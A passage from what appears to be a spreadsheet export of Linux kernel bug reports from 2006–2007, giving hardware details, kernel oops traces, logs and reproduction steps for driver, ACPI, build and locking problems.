    <t>Distribution: Debian etch Hardware Environment: Lifebook E8110 http://www.fujitsu-siemens.com/products/mobile/notebooks/lifebook_e.html http://vilpublic.fujitsu-siemens.com/vil/pc/vil/datenblaetter/mobile/en/ds_lifebook_e8110_e8210.pdf lspci: 00:00.0 Host bridge: Intel Corporation Mobile 945GM/PM/GMS/940GML and 945GT Express Memory Controller Hub (rev 03) 00:02.0 VGA compatible controller: Intel Corporation Mobile 945GM/GMS/940GML Express Integrated Graphics Controller (rev 03) 00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/940GML Express Integrated Graphics Controller (rev 03) 00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 02) 00:1c.0 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 1 (rev 02) 00:1c.1 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 2 (rev 02) 00:1c.2 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 3 (rev 02) 00:1d.0 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #1 (rev 02) 00:1d.1 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #2 (rev 02) 00:1d.2 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #3 (rev 02) 00:1d.3 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #4 (rev 02) 00:1d.7 USB Controller: Intel Corporation 82801G (ICH7 Family) USB2 EHCI Controller (rev 02) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev e2) 00:1f.0 ISA bridge: Intel Corporation 82801GBM (ICH7-M) LPC Interface Bridge (rev 02) 00:1f.1 IDE interface: Intel Corporation 82801G (ICH7 Family) IDE Controller (rev 02) 00:1f.2 IDE interface: Intel Corporation 82801GBM/GHM (ICH7 Family) Serial ATA Storage Controller IDE (rev 02) 00:1f.3 SMBus: Intel Corporation 82801G (ICH7 Family) SMBus Controller (rev 02) 02:00.0 Ethernet controller: Marvell Technology Group Ltd. 88E8055 PCI-E Gigabit Ethernet Controller (rev 12) 05:00.0 Ethernet controller: Atheros Communications, Inc. Unknown device 001c (rev 01) 08:03.0 CardBus bridge: O2 Micro, Inc. OZ711MP1/MS1 MemoryCardBus Controller (rev 21) 08:03.1 CardBus bridge: O2 Micro, Inc. OZ711MP1/MS1 MemoryCardBus Controller (rev 21) 08:03.2 Generic system peripheral [0805]: O2 Micro, Inc. Integrated MMC/SD Controller (rev 01) 08:03.3 Bridge: O2 Micro, Inc. Integrated MS/xD Controller (rev 01) 08:03.4 FireWire (IEEE 1394): O2 Micro, Inc. Firewire (IEEE 1394) (rev 02) Software Environment: Linux pgnotas 2.6.18-n01 #1 SMP Sun Nov 19 23:31:36 CET 2006 i686 GNU/Linux Gnu C 4.1.2 Gnu make 3.81 binutils 2.17 util-linux 2.12r mount 2.12r module-init-tools 3.2.2 e2fsprogs 1.40-WIP reiserfsprogs 3.6.19 PPP 2.4.4 Linux C Library 2.3.6 Dynamic linker (ldd) 2.3.6 Procps 3.2.7 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.97 udev 100 Modules Loaded thermal button processor ac battery mousedev psmouse sdhci mmc_core Problem Description: BUG: unable to handle kernel paging request at virtual address f0197e90 printing eip: f0197e90 *pde = 018d1067 *pte = 00000000 Oops: 0000 [#1] SMP Modules linked in: l2cap bluetooth thermal button processor ac battery mousedev psmouse sdhci mmc_core CPU: 0 EIP: 0060:[&lt;f0197e90&gt;] Not tainted VLI EFLAGS: 00010286 (2.6.18-n01 #1) EIP is at 0xf0197e90 eax: 00000000 ebx: f0197e90 ecx: 00000000 edx: 00000000 esi: 00000000 edi: 00000000 ebp: 00000000 esp: ee79dfe8 ds: 007b es: 007b ss: 0068 Process modprobe (pid: 1913, ti=ee79c000 task=ed95b030 task.ti=ee79c000) Stack: b0100da5 00000000 00000000 00000000 00000000 00000000 Call Trace: Inexact backtrace: [&lt;b01040e9&gt;] show_stack_log_lvl+0xa9/0xd0 [&lt;b01042c0&gt;] show_registers+0x1b0/0x240 [&lt;b010447f&gt;] die+0x12f/0x2d0 [&lt;b0112f63&gt;] do_page_fault+0x283/0x5ad [&lt;b0103a2d&gt;] error_code+0x39/0x40 Code: Bad EIP value. EIP: [&lt;f0197e90&gt;] 0xf0197e90 SS:ESP 0068:ee79dfe8 Steps to reproduce: Quick insertion and removal of rfcomm module, f.e.: for i in 1 2 3 4 5 ; do modprobe rfcomm ; rmmod rfcomm ; done - I had no bluetooth device connected - disabling second CPU from BIOS didn't help - the same oops occurred - after oops, insertions &amp; removals of module are possible, and system remains usable .config, lspci -vvv, dmesg and some files from /proc are at http://fornax.elf.stuba.sk/~palino/bug_rfcomm_2.6.18.tar.bz2</t>
  </si>
  <si>
    <t>bfields</t>
  </si>
  <si>
    <t>need to pass i8042.nomux to have touchpad working properly</t>
  </si>
  <si>
    <t>2006-11-22 08:06 UTC</t>
  </si>
  <si>
    <t>Khashayar Naderehvandi</t>
  </si>
  <si>
    <t>2007-02-09 12:03 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: always occured Distribution:Archlinux with vanilla kernel Hardware Environment:Fujitstu-Siemens Lifebook P7010 Problem Description: When X is started the touchpad reacts by moving the pointer around in a random fashion. After a few seconds the pointer moves around normally but does not behave like a touchpad, i.e. it is not controlled by the synaptic driver. This whole mess can be avoided by passing i8042.nomux to the kernel at boot time. I used to have the touchpad working just fine on this computer, even with earlier kernels, until I had it back from a reparation service at one point. After that, the touchpad stopped working properly. Steps to reproduce: 1) Boot with no particular boot parameters 2) Start X</t>
  </si>
  <si>
    <t>S3: fan doesn't work properly after resume</t>
  </si>
  <si>
    <t>2006-11-22 19:42 UTC</t>
  </si>
  <si>
    <t>Aleksander Trofimowicz</t>
  </si>
  <si>
    <t>2007-03-10 21:27 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: don't know Distribution: Fedora Core 6 Hardware Environment: hp compaq nx6325 Software Environment: Problem Description: After resume a fan C352 is turned off regardless of a temperature at TZ1, although the one should work if the temperature is above 16 C (that condition is always met). It isn't critical bug as the other three fans work fine if the TZ1 state changes. Steps to reproduce: Put system into S3 state and then back to S0. Additional info: Applying patches from bug 5524 and bug 7122 changes nothing.</t>
  </si>
  <si>
    <t>BUG: warning at drivers/ata/sata_mv.c:1281/mv_get_crpb_status()</t>
  </si>
  <si>
    <t>2006-11-30 08:07 UTC</t>
  </si>
  <si>
    <t>Philip Copeland</t>
  </si>
  <si>
    <t>2007-08-08 19:58 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: errrrrrrrrrr Distribution: fc6 but using stock kernel Hardware Environment: x86_64 Software Environment: FC6 based Problem Description: mv_get_crpb_status Steps to reproduce: wait until an ATA blip occurs? Actually I'm slightly more concered about the message output as I was given to believe that an AddrMarkNotFound error would also print out the LBAsector/sector number as well. (the disk actually checked out fine after a long read scan) Routine in question (***&gt; marks the bailout) /** * mv_get_crpb_status - get status from most recently completed cmd * @ap: ATA channel to manipulate * * This routine is for use when the port is in DMA mode, when it * will be using the CRPB (command response block) method of * returning command completion information. We check indices * are good, grab status, and bump the response consumer index to * prove that we're up to date. * * LOCKING: * Inherited from caller. */ static u8 mv_get_crpb_status(struct ata_port *ap) { void __iomem *port_mmio = mv_ap_base(ap); struct mv_port_priv *pp = ap-&gt;private_data; unsigned out_index; u32 out_ptr; u8 ata_status; out_ptr = readl(port_mmio + EDMA_RSP_Q_OUT_PTR_OFS); out_index = (out_ptr &gt;&gt; EDMA_RSP_Q_PTR_SHIFT) &amp; MV_MAX_Q_DEPTH_MASK; ata_status = le16_to_cpu(pp-&gt;crpb[out_index].flags) &gt;&gt; CRPB_FLAG_STATUS_SHIFT; /* increment our consumer index... */ out_index = mv_inc_q_index(out_index); /* and, until we do NCQ, there should only be 1 CRPB waiting */ ***&gt; WARN_ON(out_index != ((readl(port_mmio + EDMA_RSP_Q_IN_PTR_OFS) &gt;&gt; EDMA_RSP_Q_PTR_SHIFT) &amp; MV_MAX_Q_DEPTH_MASK)); /* write out our inc'd consumer index so EDMA knows we're caught up */ out_ptr &amp;= EDMA_RSP_Q_BASE_LO_MASK; out_ptr |= out_index &lt;&lt; EDMA_RSP_Q_PTR_SHIFT; writelfl(out_ptr, port_mmio + EDMA_RSP_Q_OUT_PTR_OFS); /* Return ATA status register for completed CRPB */ return ata_status; } Nov 30 12:57:40 localhost kernel: ata8: translated ATA stat/err 0x50/01 to SCSI SK/ASC/ASCQ 0x3/13/00 Nov 30 12:57:40 localhost kernel: ata8: status=0x50 { DriveReady SeekComplete } Nov 30 12:57:40 localhost kernel: ata8: error=0x01 { AddrMarkNotFound } Nov 30 12:57:40 localhost kernel: BUG: warning at drivers/ata/sata_mv.c:1281/mv_ get_crpb_status() Nov 30 12:57:40 localhost kernel: Nov 30 12:57:40 localhost kernel: Call Trace: Nov 30 12:57:40 localhost kernel: [&lt;ffffffff80268741&gt;] show_trace+0x34/0x47 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff80268766&gt;] dump_stack+0x12/0x17 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff880fbbd6&gt;] :sata_mv:mv_interrupt+0x 197/0x362 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff80210536&gt;] handle_IRQ_event+0x25/0x 53 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff802b4bac&gt;] handle_fasteoi_irq+0x92/ 0xd1 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff802698fc&gt;] do_IRQ+0x100/0x151 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff8025b641&gt;] ret_from_intr+0x0/0xa Nov 30 12:57:40 localhost kernel: DWARF2 unwinder stuck at ret_from_intr+0x0/0xa Nov 30 12:57:40 localhost kernel: Nov 30 12:57:40 localhost kernel: Leftover inexact backtrace: Nov 30 12:57:40 localhost kernel: Nov 30 12:57:40 localhost kernel: &lt;IRQ&gt; [&lt;ffffffff8807aa03&gt;] :scsi_mod:scsi_di spatch_cmd+0xe1/0x2b8 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff8807fc73&gt;] :scsi_mod:scsi_request_f n+0x2ca/0x395 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff80259bba&gt;] blk_run_queue+0x44/0x75 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff8807eabd&gt;] :scsi_mod:scsi_next_comm and+0x2d/0x39 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff8807ec13&gt;] :scsi_mod:scsi_end_reque st+0xbb/0xc9 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff8807ed7d&gt;] :scsi_mod:scsi_io_comple tion+0x15c/0x332 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff8807f011&gt;] :scsi_mod:scsi_device_un busy+0x66/0x80 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff802367f0&gt;] blk_done_softirq+0x5c/0x 6a Nov 30 12:57:40 localhost kernel: [&lt;ffffffff80211924&gt;] __do_softirq+0x55/0xc3 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff802754fd&gt;] ack_apic_level+0x33/0x47 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff8025c24c&gt;] call_softirq+0x1c/0x30 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff802697ab&gt;] do_softirq+0x2c/0x7d Nov 30 12:57:40 localhost kernel: [&lt;ffffffff8026992c&gt;] do_IRQ+0x130/0x151 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff8025b641&gt;] ret_from_intr+0x0/0xa Nov 30 12:57:40 localhost kernel: &lt;EOI&gt; [&lt;ffffffff80261b23&gt;] _spin_unlock_irqr estore+0xb/0xd Nov 30 12:57:40 localhost kernel: [&lt;ffffffff8807ab57&gt;] :scsi_mod:scsi_dispatch_ cmd+0x235/0x2b8 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff8807fc73&gt;] :scsi_mod:scsi_request_f n+0x2ca/0x395 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff80329e3b&gt;] elv_insert+0xde/0x211 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff8020b8e0&gt;] __make_request+0x405/0x4 53 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff8812549b&gt;] :dm_mod:clone_endio+0x8b /0x9f Nov 30 12:57:40 localhost kernel: [&lt;ffffffff8021b846&gt;] generic_make_request+0x2 07/0x21e Nov 30 12:57:40 localhost kernel: [&lt;ffffffff802e071c&gt;] __bio_clone+0x71/0x8a Nov 30 12:57:40 localhost kernel: [&lt;ffffffff80232339&gt;] submit_bio+0xc4/0xcb Nov 30 12:57:40 localhost kernel: [&lt;ffffffff803f0824&gt;] md_update_sb+0x1dc/0x277 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff80299dad&gt;] keventd_create_kthread+0 x0/0x66 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff803f44e3&gt;] md_check_recovery+0x163/ 0x452 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff884bc38a&gt;] :raid456:raid5d+0x15/0x1 73 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff80261b3b&gt;] _spin_lock_irqsave+0x9/0 xe Nov 30 12:57:40 localhost kernel: [&lt;ffffffff803f3cb1&gt;] md_thread+0xec/0x102 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff80299f61&gt;] autoremove_wake_function +0x0/0x2e Nov 30 12:57:40 localhost kernel: [&lt;ffffffff803f3bc5&gt;] md_thread+0x0/0x102 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff80231920&gt;] kthread+0xf3/0x124 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff8025bed8&gt;] child_rip+0xa/0x12 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff80299dad&gt;] keventd_create_kthread+0 x0/0x66 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff8023182d&gt;] kthread+0x0/0x124 Nov 30 12:57:40 localhost kernel: [&lt;ffffffff8025bece&gt;] child_rip+0x0/0x12</t>
  </si>
  <si>
    <t>irq 18: nobody cared - Intel STL2 SCI INT_SRC_OVR</t>
  </si>
  <si>
    <t>2006-11-30 12:50 UTC</t>
  </si>
  <si>
    <t>2007-02-15 23:33 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.18.3 Distribution: Fedora Core 6 Hardware Environment: 00:00.0 Host bridge: Intel Corporation 82815 815 Chipset Host Bridge and Memory Controller Hub (rev 02) 00:01.0 PCI bridge: Intel Corporation 82815 815 Chipset AGP Bridge (rev 02) 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev 05) 00:1f.0 ISA bridge: Intel Corporation 82801BA ISA Bridge (LPC) (rev 05) 00:1f.1 IDE interface: Intel Corporation 82801BA IDE U100 (rev 05) 00:1f.2 USB Controller: Intel Corporation 82801BA/BAM USB (Hub #1) (rev 05) 00:1f.3 SMBus: Intel Corporation 82801BA/BAM SMBus (rev 05) 00:1f.4 USB Controller: Intel Corporation 82801BA/BAM USB (Hub #2) (rev 05) 01:00.0 VGA compatible controller: nVidia Corporation NV34 [GeForce FX 5200] (rev a1) 02:09.0 FireWire (IEEE 1394): Texas Instruments TSB12LV23 IEEE-1394 Controller 02:0a.0 Multimedia video controller: Brooktree Corporation Bt848 Video Capture (rev 12) 02:0b.0 USB Controller: NEC Corporation USB (rev 43) 02:0b.1 USB Controller: NEC Corporation USB (rev 43) 02:0b.2 USB Controller: NEC Corporation USB 2.0 (rev 04) 02:0c.0 Multimedia audio controller: Ensoniq ES1370 [AudioPCI] (rev 01) 02:0e.0 Ethernet controller: Intel Corporation 82557/8/9 [Ethernet Pro 100] (rev 08) Software Environment: Mainline kernel, gcc 4.1.1, glibc 2.5 Problem Description: Since kernel 2.6.19 (today), the message "irq 18: nobody cared ..." appeared. I do not know how serious this could be, but it does not look good, expecially considering that kernel 2.6.18.3 was fine. Steps to reproduce: Reboot the box with 2.6.19... :-) I tried with PNP OS (in BIOS) yes/no with same result. I also create dmesg and /proc/interrupts output with 2.6.18.3, 2.6.19 and 2.6.19 with "irqpoll". The last one seems to work properly, i.e. the irq 18 is assigned properly. Performace wise, I don't know. If I found the way :-) all attach the files here.</t>
  </si>
  <si>
    <t>2006-11-30 13:16 UTC</t>
  </si>
  <si>
    <t>2007-01-26 08:51 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.18.3 Distribution: RHEL4-U2 AS Hardware Environment: 8 CPU Dual Core Opteron box with 32Gb of ram http://www.iwill.net/product_2.asp?p_id=90&amp;sp=Y Software Environment: RHEL4-U2 gcc version 3.4.4 20050721 (Red Hat 3.4.4-2) Problem Description: Compilation fails with the error message: .... CC fs/nfs/client.o CC fs/nfs/dir.o fs/nfs/dir.c: In function `nfs_access_add_cache': include/asm/bitops.h:122: error: inconsistent operand constraints in an `asm' make[2]: *** [fs/nfs/dir.o] Error 1 make[1]: *** [fs/nfs] Error 2 make: *** [fs] Error 2 Steps to reproduce: 1) Create a .config with "make menuconfig" 2) Compile with "make &amp;&gt; make.log &amp;" I will attach .config if it is requested.</t>
  </si>
  <si>
    <t>iptables-1.3.6 - does not compile on kernel 2.6.19</t>
  </si>
  <si>
    <t>2006-11-30 14:48 UTC</t>
  </si>
  <si>
    <t>cilly@cilly.mine.bz</t>
  </si>
  <si>
    <t>2007-07-22 09:24 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.18.4 For further infos see: https://bugs.gentoo.org/show_bug.cgi?id=156723 Here a short summary: i586-pc-linux-gnu-gcc -march=i586 -Os -m3dnow -mmmx -pipe -fomit-frame-pointer -Wall -Wunused -I/usr/src/linux/include -Iinclude/ -DIPTABLES_VERSION=\"1.3.6\" -fPIC -o extensions/libipt_iprange_sh.o -c extensions/libipt_iprange.c In file included from extensions/libipt_iprange.c:9: /usr/src/linux/include/linux/netfilter_ipv4/ipt_iprange.h:11: error: expected specifier-qualifier-list before</t>
  </si>
  <si>
    <t>Dylan Martin</t>
  </si>
  <si>
    <t>Memory leak and broken fan control</t>
  </si>
  <si>
    <t>2006-12-02 18:51 UTC</t>
  </si>
  <si>
    <t>Dalibor Straka</t>
  </si>
  <si>
    <t>2007-06-14 21:48 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur:2.6.19-rc6 Distribution:debian unstable Hardware Environment:notebook HP nx6325 Software Environment: Problem Description: I am often running out of memory. It looks like an ACPI code is guilty: dast@lili:~$ grep -i acpi /proc/slabinfo Acpi-Operand 3076 3127 64 59 1 : tunables 120 60 8 : slabdata 53 53 0 Acpi-ParseExt 16 59 64 59 1 : tunables 120 60 8 : slabdata 1 1 0 Acpi-Parse 76 92 40 92 1 : tunables 120 60 8 : slabdata 1 1 0 Acpi-State 1644960 1644960 80 48 1 : tunables 120 60 8 : slabdata 34270 34270 0 Acpi-Namespace 1177 1232 32 112 1 : tunables 120 60 8 : slabdata 11 11 0 dast@lili:~$ free Mem: 899280 892472 6808 0 82212 77936 -/+ buffers/cache: 732324 166956 Swap: 2634620 243052 2404568 Actualy the Acpi-State's memory is increasing slowly in minutes: Output of grep -i acpi-state /proc/slabinfo: Acpi-State 16176 16176 80 48 1 : tunables 120 60 8 : slabdata 337 337 0 Acpi-State 18816 18816 80 48 1 : tunables 120 60 8 : slabdata 392 392 0 Acpi-State 19200 19200 80 48 1 : tunables 120 60 8 : slabdata 400 400 0 Acpi-State 20160 20160 80 48 1 : tunables 120 60 8 : slabdata 420 420 0 Steps to reproduce: grep -i acpi /proc/slabinfo acpi -V The last command cleans up all buffers and freezes a system for a while. Also sets the right fan speed according to the actual temperature. Without "watch acpi -V" is fan out of control ;-).</t>
  </si>
  <si>
    <t>realtek r8169 performance decreased on 2.6.19</t>
  </si>
  <si>
    <t>2006-12-03 10:29 UTC</t>
  </si>
  <si>
    <t>Hugues Freville</t>
  </si>
  <si>
    <t>2007-01-01 14:02 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.18.3 Distribution: Debian Etch with vanilla kernel Hardware Environment: Athlon64 with nforce430 chipset and realtek pci network card. lspci -n for realtek card : 01:06.0 0200: 10ec:8169 (rev 10) Software Environment: Debian Etch for amd64 Problem Description: Upgrading from 2.6.18.3 to 2.6.19 i noticed decreased performance of my realtek network card I make tests with iperf over tcp and udp vanilla 2.6.18.3 give me 650Mbps vanilla 2.6.19 give me 280Mbps The problem is related to the new r8169.c version, using a 2.6.18.3 with r8169.c patched to 2.6.19 version give me the same problem (more details: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=400524) vanilla 2.6.18.3 + r8169 from 2.6.19 give me 280Mbps Steps to reproduce: - build and boot with 2.6.18.3, see that you get 650Mbps - build and boot with 2.6.19, see that you get 280Mbps More Informations : motherboard is : GA-K8N51GMF-9 full lspci : 00:00.0 RAM memory: nVidia Corporation C51 Host Bridge (rev a2) 00:00.1 RAM memory: nVidia Corporation C51 Memory Controller 0 (rev a2) 00:00.2 RAM memory: nVidia Corporation C51 Memory Controller 1 (rev a2) 00:00.3 RAM memory: nVidia Corporation C51 Memory Controller 5 (rev a2) 00:00.4 RAM memory: nVidia Corporation C51 Memory Controller 4 (rev a2) 00:00.5 RAM memory: nVidia Corporation C51 Host Bridge (rev a2) 00:00.6 RAM memory: nVidia Corporation C51 Memory Controller 3 (rev a2) 00:00.7 RAM memory: nVidia Corporation C51 Memory Controller 2 (rev a2) 00:02.0 PCI bridge: nVidia Corporation C51 PCI Express Bridge (rev a1) 00:03.0 PCI bridge: nVidia Corporation C51 PCI Express Bridge (rev a1) 00:04.0 PCI bridge: nVidia Corporation C51 PCI Express Bridge (rev a1) 00:05.0 VGA compatible controller: nVidia Corporation C51G [GeForce 6100] (rev a2) 00:09.0 RAM memory: nVidia Corporation MCP51 Host Bridge (rev a2) 00:0a.0 ISA bridge: nVidia Corporation MCP51 LPC Bridge (rev a2) 00:0a.1 SMBus: nVidia Corporation MCP51 SMBus (rev a2) 00:0a.2 RAM memory: nVidia Corporation MCP51 Memory Controller 0 (rev a2) 00:0b.0 USB Controller: nVidia Corporation MCP51 USB Controller (rev a2) 00:0b.1 USB Controller: nVidia Corporation MCP51 USB Controller (rev a2) 00:0d.0 IDE interface: nVidia Corporation MCP51 IDE (rev a1) 00:0e.0 IDE interface: nVidia Corporation MCP51 Serial ATA Controller (rev a1) 00:0f.0 IDE interface: nVidia Corporation MCP51 Serial ATA Controller (rev a1) 00:10.0 PCI bridge: nVidia Corporation MCP51 PCI Bridge (rev a2) 00:10.1 Audio device: nVidia Corporation MCP51 High Definition Audio (rev a2) 00:14.0 Bridge: nVidia Corporation MCP51 Ethernet Controller (rev a1) 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control 01:06.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8169 Gigabit Ethernet (rev 10) 01:07.0 Ethernet controller: Intel Corporation 82540EM Gigabit Ethernet Controller (rev 02) 01:0e.0 FireWire (IEEE 1394): VIA Technologies, Inc. IEEE 1394 Host Controller (rev 80)</t>
  </si>
  <si>
    <t>os_scsi_tapes_lock should not be acquired before calling new_tape_buffer</t>
  </si>
  <si>
    <t>2006-12-04 22:27 UTC</t>
  </si>
  <si>
    <t>Lin Tan</t>
  </si>
  <si>
    <t>2008-09-25 12:51 UTC</t>
  </si>
  <si>
    <t>Problem Description: os_scsi_tapes_lock should not be acquired before calling new_tape_buffer. However, in line 5736 of drivers/scsi/osst.c, the lock is acquired and new_tape_buffer is called in line 5773. 5736 write_lock(&amp;os_scsi_tapes_lock); ... 5768 5769 /* allocate a buffer for this device */ 5770 i = SDp-&gt;host-&gt;sg_tablesize; 5771 if (osst_max_sg_segs &lt; i) 5772 i = osst_max_sg_segs; 5773 buffer = new_tape_buffer(1, SDp-&gt;host-&gt;unchecked_isa_dma, i);</t>
  </si>
  <si>
    <t>Race: a lock should be acquired before calling bhv_base_unlocked</t>
  </si>
  <si>
    <t>2006-12-04 22:47 UTC</t>
  </si>
  <si>
    <t>2008-09-25 11:53 UTC</t>
  </si>
  <si>
    <t>Potential Data Race: a lock should be acquired before calling bhv_base_unlocked according to comments before bhv_base. However, in the following call chain, no lock is acquired before calling 435 bdp = bhv_base_unlocked(VN_BHV_HEAD(vp)); (This code is in file fs/xfs/linux-2.6/xfs_ioctl.c) The call chain is: xfs_ioctl calls xfs_fssetdm_by_handle calls bhv_base_unlocked In the entire call chain, no lock is acquired for calling bhv_base_unlocked, and xfs_ioctl can be exposed functions outside the module, which can be very dangerous.</t>
  </si>
  <si>
    <t>Kernel BUG at mm/memory.c:1124</t>
  </si>
  <si>
    <t>2006-12-06 19:51 UTC</t>
  </si>
  <si>
    <t>Ramiro Voicu</t>
  </si>
  <si>
    <t>2007-01-03 16:43 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.17 ... as far as I remember ( for sure it works fine with 2.6.15.4 ) Distribution: Red Hat Enterprise Linux AS release 4 (Nahant Update 4) &amp; Slackware 11 cat /proc/version Linux version 2.6.19-RH-server-250-lock (root@xxxx.cern.ch) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-3)) #2 SMP Tue Dec 5 16:29:12 CET 2006 Hardware Environment: CPU: 2CPU-s Dual core Opteron ( 4 entries in /proc/cpuinfo ) &lt;snip&gt; model name : Dual Core AMD Opteron(tm) Processor 275 cat /proc/modules myri10ge 41296 0 - Live 0xffffffff8806a000 af_packet 19788 0 - Live 0xffffffff88064000 binfmt_misc 10764 1 - Live 0xffffffff88060000 dm_mirror 19776 0 - Live 0xffffffff8805a000 dm_mod 55696 1 dm_mirror, Live 0xffffffff8804b000 ohci_hcd 20292 0 - Live 0xffffffff88045000 ehci_hcd 31304 0 - Live 0xffffffff8803c000 usbcore 132840 3 ohci_hcd,ehci_hcd, Live 0xffffffff8801a000 i2c_nforce2 7872 0 - Live 0xffffffff88017000 i2c_core 20288 1 i2c_nforce2, Live 0xffffffff88011000 floppy 62632 0 - Live 0xffffffff88000000 Problem Description: I am using a Java program ( based on NIO ) to do some data transfers. I have encountered the problem since 2.6.18 ( with all 2.6.18.x versions and all the -rc versions from 2.6.19 ) The problem appeared not only on the machine above, but also on my desktop machine with the same error in /var/log/messages. With 2.6.19-rc6 my machine freezes completly with no error reports. When the kernel gets stuck I got the following message in the console: Message from syslogd@xxxxx at Thu Dec 7 04:17:21 2006 ... xxxxx kernel: [128531.708976] invalid opcode: 0000 [1] SMP And in /var/log/messages: Dec 7 04:17:21 xxxxx kernel: [128531.708947] ----------- [cut here ] --------- [please bite here ] --------- Dec 7 04:17:21 xxxxx kernel: [128531.708967] Kernel BUG at mm/memory.c:1124 Dec 7 04:17:21 xxxxx kernel: [128531.708976] invalid opcode: 0000 [1] SMP Dec 7 04:17:21 xxxxx kernel: [128531.708988] CPU 0 Dec 7 04:17:21 xxxxx kernel: [128531.708995] Modules linked in: myri10ge af_packet binfmt_misc dm_mirror dm_mod ohci_hcd ehci_hcd usbcore i2c_nforce2 i2c_core floppy Dec 7 04:17:21 xxxxx kernel: [128531.709032] Pid: 21891, comm: java Not tainted 2.6.19-RH-server-250-lock #2 Dec 7 04:17:21 xxxxx kernel: [128531.709045] RIP: 0010:[&lt;ffffffff8026722b&gt;] [&lt;ffffffff8026722b&gt;] zeromap_page_range+0x2ab/0x330 Dec 7 04:17:21 xxxxx kernel: [128531.709066] RSP: 0018:ffff81011639be38 EFLAGS: 00010202 Dec 7 04:17:21 xxxxx kernel: [128531.709076] RAX: 0000000000000400 RBX: 8000000000629025 RCX: 000000000000001f Dec 7 04:17:21 xxxxx kernel: [128531.709090] RDX: ffff8100006a88f8 RSI: 00002aaaad781000 RDI: ffff8100006a88f8 Dec 7 04:17:21 xxxxx kernel: [128531.709104] RBP: ffff8100006a88f8 R08: 0000000000000000 R09: 0000000000000000 Dec 7 04:17:21 xxxxx kernel: [128531.709118] R10: 0000000000000002 R11: 0000000000000202 R12: ffff810062b20fa0 Dec 7 04:17:21 xxxxx kernel: [128531.709161] R13: 00002aaaadbf4000 R14: ffff810065a81240 R15: ffff810069f21b68 Dec 7 04:17:21 xxxxx kernel: [128531.709205] FS: 0000000043686960(0063) GS:ffffffff805b7000(0000) knlGS:00000000f7f1c6c0 Dec 7 04:17:21 xxxxx kernel: [128531.709250] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 Dec 7 04:17:21 xxxxx kernel: [128531.709277] CR2: 00002b7df12d7f58 CR3: 0000000069888000 CR4: 00000000000006e0 Dec 7 04:17:21 xxxxx kernel: [128531.709321] Process java (pid: 21891, threadinfo ffff81011639a000, task ffff81011bb7c100) Dec 7 04:17:21 xxxxx kernel: [128531.709365] Stack: 00002aaaadf80fff 00002aaaadf80fff 00002aaaadf80fff ffff810001c29f10 Dec 7 04:17:21 xxxxx kernel: [128531.709413] 00002aaaadc00000 00002aaaadf81000 ffff8100654ec550 00002aaaadf81000 Dec 7 04:17:21 xxxxx kernel: [128531.709460] 00002aaaadf81000 ffff8100698882a8 8000000000000025 0000000000800000 Dec 7 04:17:21 xxxxx kernel: [128531.709491] Call Trace: Dec 7 04:17:21 xxxxx kernel: [128531.709532] [&lt;ffffffff803b751f&gt;] 